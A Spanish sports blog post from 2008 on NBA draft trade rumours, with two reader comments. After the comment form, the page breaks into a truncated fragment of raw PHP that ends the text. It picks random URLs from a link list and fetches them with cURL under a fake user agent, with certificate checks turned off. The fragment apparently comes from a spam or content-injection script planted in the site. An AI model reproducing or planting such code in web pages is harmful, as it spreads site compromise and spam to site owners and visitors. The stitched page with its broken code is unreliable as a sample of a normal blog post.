Rumores del draft

10 de June de 2008 por txusma

Falta tan solo un poquito más de 2 semanas para que lleve a cabo el draft y los rumores que lo rodean no dejan de aparecer y desaparecer.

Parece ser que hay varios equipos buscando descender unos puestos, entre ellos Memphis que se encuentra con una difícil quinta elección. Está clarísimo que Derrick Rose y Michael Beasley no caeran tanto y además Jerryd Bayless ya ha declarado que no tiene ninguna intención de jugar para ellos por lo que no perderá su tiempo en workouts y similares. OJ Mayo y Brook López están esperando el devenir de los acontecimientos y de momento tampoco acudirán a los entrenamientos privados, cosa que si hará Eric Gordon, el escolta de la universidad de Indiana. Así las cosas, y debido más a las necesidades de los Grizzlies en el juego interior que a la calidad de los jugadores implicados, muchos mocks apuntan a la elección de Kevin Love en su turno. No es descartable pues, que los Memphis retrocedan algun puesto en el draft buscando elegir aún a Kevin Love y además desprenderse de algún contrato (por ejemplo, el de Brian Cardinal).

Los Sixers, con una boyante situación salarial, sería uno de los equipos que podría estar interesado en esa 5ª elección de los Grizzlies, aunque de momento los rumores apuntan a un posible traspaso con los New York Knicks a través del cual se harían con Zach Randolph y la elección número 6, a cambio de la posición 16 del draft y Reggie Evans, con un contrato mucho más “agradable” que el de Zach. Con este traspaso los Sixers se harían con un teórico 20-10 y además conseguirían a un jugador como OJ Mayo, Eric Gordon o Jerryd Bayless en el proceso. En New York parecen estar haciendo hueco para la temporada 2010, fecha en la que podrían hacer una intentona por Lebron James, y además mantendrían y darían protagonismo a David Lee.

Minnessota con la elección número 3, tampoco se cierra en banda aun posible traspaso ya que le da igual escoger a Brook Lopez o a Kevin Love y por tanto, podría traspasar esa ronda a cambio de bajar unos puestos y una ronda adicional. Lo que les frena es la posibilidad de que puedan elegir a Derrick Rose o Michael Beasley, porque suenan con fuerza los piropos a OJ Mayo desde Miami a cargo de Dwyane Wade y Pat Riley.

También es posible que los Pacers empaqueten su elección número 11 junto a uno de sus horribles contratos (suena con insistencia Jarmaine O’Neal) a cambio, principalmente, de jugadores en último año. El destino que más suena son los Cleveland Cavaliers, a cambio de los expirings de Wally Szcerbiack y Eric Snow. En la franquicia de Ohio quieren demostrar a Lebron que están construyendo un equipo capaz de aspirar al campeonato.

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Sobre lo de los Knicks y Philly… resulta bastante interesante para ambos. Philly daría un importante salto de calidad sin perder apenas nada, aunque ya se sabe que todo lo que incluya a Randolph en tu plantilla se puede volver un arma de doble filo.

    Sobre Cleveland… desde luego que sería interesante tener a O’Neal… eso si es cierto eso que sólo habrían expirings involucrados en el traspaso… ya me parecería raro por parte de Indiana, que hagan lo de Gasol

      Citar

  2. Viva_Dirk dice:
    #2

    Pues los Wolves se equivocan si les da igual elegir a Love que a Lopez. Lopez es un center, cosa que Al Jefferson no es ni deben intentar que lo sea porque donde saca mas ventajas es en la posición de 4; Lopez puede hacer un muy buen trabajo junto a el, juntar a dos tios tan jóvenes de 7 pies y con talento es una utopía para la mayoria de equipos. Eso si quieren elegir un interior como parece, porque de elegir al mejor no deberian dejar pasar a OJ Mayo.

    Love es otra cosa, Memphis desde luego haría bien en elegirlo y puede llevarse una desagradable sorpresa si traspasa el 5 por alguna mas baja pensando en el porque igual no le llega.

    Los piropos de los Heat a Mayo no me los creo porque es el mismo tipo de jugador que Wade, no hay nadie mas imcompatible con Wade que OJ.

    El trade de los Knicks y los Sixers dejaría a los de Phily con muy buena pinta y aun dinero para gastar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>